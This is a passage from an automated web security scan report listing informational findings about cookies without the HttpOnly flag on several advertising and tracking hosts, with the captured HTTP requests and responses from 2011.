Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 95
Content-Type: image/png
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=qo83J; path=/; domain=.facebook.com
X-FB-Server: 10.144.22.108
X-Cnection: close
Date: Thu, 12 May 2011 13:31:32 GMT

.PNG
.
...IHDR.............%.V.....PLTE...........tRNS.@..f...
IDAT..c`.......qd.....IEND.B`.
9.44. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://badge.facebook.com
Path:   /badge/111279988891248.528147018.678371001.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge/111279988891248.528147018.678371001.png HTTP/1.1
Host: badge.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 95
Content-Type: image/png
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=v7n-W; path=/; domain=.facebook.com
X-FB-Server: 10.144.54.120
X-Cnection: close
Date: Thu, 12 May 2011 13:31:32 GMT

.PNG
.
...IHDR.............%.V.....PLTE...........tRNS.@..f...
IDAT..c`.......qd.....IEND.B`.
9.45. http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6d4cb6550583e1fdb81b2fe52a3cce9a; aud=ABR4nGNgYGDwPbXkLAMDo%2F79yYfmMNgzMAgoNTA0MDCIeYMphl4IzwdM8VwGUyKvGEBAJBlM8dwEC4rmgin%2BSgjvGZjiWgsRrIJoPwuRSwdTHK0QXiJEyV8ILwFiQwHYaL5IiO2PwZTgLIg%2BI4jRM8CU8C6IhnMQU9wgpvhBqENgivcPxPb3EMOKIBTU9m0Qo79CVDJDBPdDlHRDBKXBlEAZRG4hhFoEMZMP4haIAwUqwJRQMphi44XwXkK8IgrRJwxxZx9Ew3GIkgwIBQkzoWIIVQKhIGbymkI0REHs84fwoiGOPwikALBDZfw%3D; cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALfU0vO%2Fn%2FyqIyBgVH%2F%2FuRDc0BiDDYhX7SYGRjO%2Ftb%2BDxS3BFKMDAxfILz%2FDMEhX7TxyAqy%2FQXJ%2FvwM4k8CUkBZSQjvP0OowLfdeGX34DFZ4NteRgbGTQwMQGGgBKOgiiE%2Bdyjm4ZF1sKjAZ9OvRhSbHCwq8brrCopqgZ8T8Pnx50Q8soJCxfhs%2BtmPz%2BQfc1Hc4SyrxAEzC6YMoglqMqPFhnUgSnKBLJI9YANAokwMDCz%2FGY4Hmj5ENfb3AhR%2BoKMTKt%2F0Hhr%2FLqp%2B76%2Bo8s630fho%2Bg1bUflGZqh8u8eofD0vNL43Kt%2BiCJVvux%2BVryuKytdpQuU7taHyTdrR9C9D5eujqTc4j8a%2FhBo%2BRw6h8LW1b%2BCJdG2NAjyyQSlH8enVasQjGxp2Fk9SVOb6ywqXRdWLrpZJ%2B7QKbnsYtU8r45ENO4PHf4xKSRfANmmBwgrID6pmArtZE%2BIOTYg7NKGqI8XM8Jjln78Or00rUWyK2ByIR3VEkxQ%2BP134iGKWsoADHtUM3LJmFynKyAG8%2B9iIiitIogtcxEyRdVz1DRTp53y8nCL93Am7KNS%2FkyL9Tv8WkRLcMnXqlAV36ySK9PNVvKVIPwBMpM8N

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nCWRvUtCYRTGTxgh4tXrx3Vx6x8QBP%2BFCPpwFHNRHHQRQqOsyUUcohaXiJbcXRVaJIdEpBanRlGEXJraCpLnd5cfz3vOc87zvtfM7GS2yJjtpFaVYc8Ozdz9lrXMEkem7w51LBGcS8U3oCwEPwWvJoSvUWsZAn0hfIP9XfAqtJQEfxtVxP7H6HMhlBcCT%2FL501KRRyItqT2oFnsR4h9MOWDmG%2FtOUWMhSqfzS%2FhvqUSd2hTVJm6Xzg5TBmz%2FERwfM0dkueUwKbiXMrhX%2BJ7p7LEvRGrCu021RHnIPYcQX9zd4yr32GOoXQxV7BMMa9DgMEfLBYdNkmWonakWeSVggX%2BU3db%2BAUmdX9s%3D; Domain=.crwdcntrl.net; Expires=Mon, 06-Feb-2012 13:31:33 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w9N%2Fz9exsfAwKj%2FJH37IgawYMgXLWYGhrMMDP%2BB4pZAipGB4QuYxwRE%2FxiCQ75o41cgyPYXpOD%2FP5CCSV%2FWghRIAikg7x9DqMC33axw7aiyWAwDKt%2BD3zaBb3sZGRg3%2FdoFlGH8z8AoqGJIwHmKefgVOFhUELDyVyOKlQ4WlYTceIUFTQFUO5I6oEHC%2FN04DAIymAS%2BncIjK5%2FXhE%2Fvzwn44uTnRDyyZp9whQfIZEGhYgKe%2F9mPz%2Bofc1HC0llWiQNmHEwZRBMs4CxWZ4AoyVnXkRwCNgAkCrSK%2BR%2FD8f8MLKFhZ%2FE7LPzeTTz%2BiuC2wCMb%2FiYTj6zM%2F9O4ZRndrM%2FhkZUz3IJHVljNEo%2Bsf%2F5JPLLa2jdAsshhihQR2hoFeGSDUo7i06vViEdW8PtsRAKwBFIgV0F4QKS1RxWPbKBKDB7Z0J6ZeGTlGiXwyCpz%2FWXFkSwtwYIwtf8YmAJNH6Im0t8LUPiBjk6ofNN7qOq9v6LJ30XlO99G46PqDzRsReUbmaHy7R6j8vW80PjeqHyLIlS%2Brigq33Y%2FKl%2BnCZXv1Iamfxkq36Qdla%2BPpt7gPBr%2FEmp4HTmEwtc%2BrYI7fQFllfHIhp3Bk64ZlZIuMCLFNGNQNRNI9dfH4HQApFBkI8XMcBdlwNy3Dq9NK1HMitgciEd1RJMUPj9d%2BIhilrKAAx53MXDJml2kqFAN4N3HRkydDY2ywEXMFFnHVd9AkX7uhF0U6ed8vJxC%2B3dSpF%2BmTp2y8GudRJF%2Bvoq3FOkHALb3XBs%3D; Domain=.crwdcntrl.net; Expires=Mon, 06-Feb-2012 13:31:33 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 827

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...
9.46. http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6d4cb6550583e1fdb81b2fe52a3cce9a; aud=ABR4nCWRP0tCYRyFf5FEiPePf%2B5d3PoCQtBXkKDMMcxFEawlCIu6NblIQ9TSEtGiu2tDS%2BSgRuTi1BYUQi1NQkOBcp473Ifzvuec9%2Ffea2ZWeHkfmi3kPuver62b%2BStNa5qFG6bnErUpkRhLZb5BTUi8CcG%2B4J2iJgrEu4J3RvxVCHZlWW7hrJL7R1WoPhDidwq4JYb4EJK3xFex3MiSfhAyI8rylPU5bwvVE1I4nT%2BG%2F5EKG%2Bw9o1qMe43znJZ7Tp8KziKdj0x2wWJW8I8V8E%2FItXF2OM9laq7iR7Kk%2BJBLDkN8CW5ALs2NrkCM6gHOPTABh3Ru03nEYsRka%2Bzt8FeKqLJU8mn%2BmgHa7mAa; cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w9O%2FH%2B8rJqBgVH%2FSRr%2FD5AYg0fIFy1mBoazDAz%2FgeKWQIqRgeELmMcEFPjHEBzyRRu%2FAkG2vwgFk76sBymQBFJg2VCBb7tZcchiMQyofA9%2B2wS%2B7WVkYNz0aw9QhvE%2FA6OgiiEB5ynm4VfgYFFBwMpfjShWOlhUEnLjFRY0BVDtSOqABgnzd%2BMwCMhgFPh2Co%2BsfF4TPr0%2FJ%2BCJE7NPuHwM0TsRj15BoWICnv%2FZjy85%2FJiLEpbOskocMNUwZRBNsICzWJ0FoiRn3URyJtgAkCjQKqZ%2FDMf%2FM7CEhp0lkBC%2Bz8bja609qnhkA1Vi8MiG37uJRza0ZyYe2QhuC3wmv8nEIyvXKIFHVlv7BkgWOUyRIkJbowCPbFDKUXx6tRrxyCpz%2FcWX4xngbvzHwBRo%2BhA1OfxegMIPdHRC5ZveQ%2BPfRdXv%2FRVV3vk2Gh9Nv2ErKt%2FIDJVv9xiVr%2BeFxvdG5VsUofJt96PydUVR%2BTpNqHynNlS%2BSTua%2FmWofH009Qbn0fiXUMPnyCEUvvZpFdwxCZRVxiMbdgZPCmJUSrrAiBTTjEHVTCDVX5%2BC0wGQQpGNFDPDXWgw%2Buevw2vTShSzIjYH4lEd0SSFz08XPqKYpSzggMddDFyyZhcpKr4CePexEVM7QqMscBEzRdZx1TdQpJ%2Fz8XKK9HMn7KJQ%2F06K9MvUqVMWfq2TKNLPV%2FGWIv0AtwcG3g%3D%3D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:08 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nCWRzytEcRTFr0ga75fveC9lJ9ZK%2BReU37uRsSGKlPLbjFKzkcXExkaymJmytLWwEQs%2FEimlLEWKjVJ2lHE%2Bb%2FFO595z7r3fe83MBm%2Be781qOl9nWzosaxa12f%2BX9AtsGzYg8B4EzR8FK1RhUuA9KRjPiYV5QfymYOpIEK6jvBVLhximFWzYxDCB8pfcuKDpkH7zkqQOxIJRfF1I9sWSF%2Frt0eGEAe%2FEGn1K9whciRdNUSxDvwuCX7Ah2f087BwfNZMNMf%2BHhXwSXER5hfKaIA%2FzdjFsITlm6m9GasfQi6QWySmzFAXRKrlW2BqSMlAhuMIsAWyBTbCQKEc%2FmHsEOFw9e3HvYkHMsvooneaaO8xZR7FLDDPKOU7slsiN4OO2bhnIschuJFkmG4aNMdlZ9fcHiTxN1g%3D%3D; Domain=.crwdcntrl.net; Expires=Mon, 06-Feb-2012 13:34:08 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w8v%2FH%2B8tJiBgVH%2FSZaEKkiMwV%2Fg2242BoazDAz%2FgeKTvqz6z8jAIAnhWf7%2FC%2BQxLgDygIJfgDwGBiYGBu5%2FDKEC3%2FYwA3WBhaDqEAo4%2FzEEC3zbC9S66dd2kAn%2FGRgFFfPwaxBUMSRk4hWEQ6EKoA6FuBBqG5JDgfYK83fjMBbI4BT4doIZZiaaYUATBL6dwqNXPq8Jj6ygUDF%2B74R80SKkQJtAgPx8jcfxgmx%2Fwdp%2FI8fr%2F38gHij%2Bfl7A5%2FGf1%2FDK3sUn%2B6sRJeIdLCrwe8PBopKQPyfg9clEPLJmnypY8SYaRJRxC%2Fzsx2fPj7ko%2FnKWVeJEDwWIJli%2BsVidisg%2BjJKzriBZBzYHJAq0kfcfw%2FH%2FDCze%2B%2FXwBKu1bgEeWXu3xXhkzflE8Mh6B1%2FFIxv8yRmPrNYeZdyyjILfV%2BKRFVYzwiMb2tODR9Y%2F%2FyU%2BvWFn8acobQ1wYAJjCymmITxgTAelHMUjq619A5%2BsViMe2QhuCzxFRvibTHyy927ikVXm%2BssKl0VNu%2BgBAHQIk%2BD32YikbgmkwAp%2BQwxjlPl%2FGrdVjFp7VPHoDVSJwSPrZn0Oj8lyhuD0AnY2zPULgBQjVHYLHr3CapZ4ZN2s1%2BAxObRnJh43y8%2Fgw6PXP%2F8kHnu9XlzHIxsIrfJwuOp8I77QaJTAFwvOt1EKq0Dne6h8IzNUvt1jVL7tflS%2BThMq36kNla%2B7DJWvjyrvfOQQqrzpQ1T53wtQ5R2d0NSjud%2F0Lqp%2B768ofAYeWbOL1CieA3j3sZPQOoI6IXARMzUs56pvoIYxPv9O4ygsuVonUcMCvoq31DDG6exTHO7kfLycGhZwJ%2ByijjE7qWGMTJ06NYwBALVfHMo%3D; Domain=.crwdcntrl.net; Expires=Mon, 06-Feb-2012 13:34:08 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 815

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...
9.47. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTc0Njg0NDcyNTQwNDcvMTA0MTIwLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVGhpaXlIaTBCQlctVzV6TXhEOW5FbDgv/s3y_oOCh3r6kEExIjKyijkGnx4A&price=TcvhHwAGp0EK7FrEovpTs1SWtx2tmnBm2xV6cA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRcf1H-HLTcHOGsS1sQezp-mXCtzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCnBjAAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtzIVcp8F8Val1fxHHRvU63fV_G8kg%26client%3Dca-pub-3629939364375984%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070545&bpp=2&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945%2C1110596607&correlator=1305207063071&frm=0&adk=3981566363&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=3&dtd=114&xpc=HVEaewoQQ1&p=http%3A//www.milehighonthecheap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:14 GMT
Set-Cookie: mt_mop=4:1305207074; domain=.mathtag.com; path=/; expires=Sun, 11 May 2014 13:31:14 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Thu, 12 May 2011 13:31:10 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x2, ord-bidder-x1
Server: MMBD/3.5.5
Content-Length: 896
Content-Type: text/html
Connection: keep-alive

<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/I36/jview/268359963/direct/01/254397468447254047?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D254397468447254047%
...[SNIP]...
9.48. http://bpx.a9.com/ads/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bpx.a9.com
Path:   /ads/getad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/getad?p=631&v=1&r=660545 HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Set-Cookie: bpx_ustats="sinDsHPuWlsOp9v8v1xuZBiYj2tNfmDcgTOPhhZG/A0="; Version=1; Max-Age=86400; Expires=Fri, 13-May-2011 13:31:03 GMT; Path=/
Content-Type: text/javascript
Content-Length: 504
Date: Thu, 12 May 2011 13:31:03 GMT

a9_render_ad({"s":"728x90","tr":false,"nid":81,"p":631,"n":"Pubmatic","html":"<!-- PubMatic ad tag (Javascript) : Title Page 728x90 BTF US ONLY | http://IMDB.com/TitlePage | 728 x 90 Leaderboard -->\r
...[SNIP]...
9.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2344481&PluID=0&w=300&h=250&ord=2310578&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/w%3B236732442%3B0-0%3B0%3B31555527%3B4307-300/250%3B41285215/41303002/1%3B%3B%7Eaopt%3D2/1/81/0%3B%7Esscs%3D%3f$$&z=800 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001klD7aM7G077T00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001iLzpaM7607l000001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA90N.0000000001uB9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001klD7aM7G077T00001jFT.aLQg0duS00001kgh7aLQg02WG00001jpA4aM9n0bdR00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001iLzpaM7607l000001; expires=Wed, 10-Aug-2011 09:28:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB8Yox0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA90N.0000000001uB910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 09:28:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 13:27:59 GMT
Connection: close
Content-Length: 2847

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
9.50. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?bapid=6388&uid=768910&kid=43105999 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
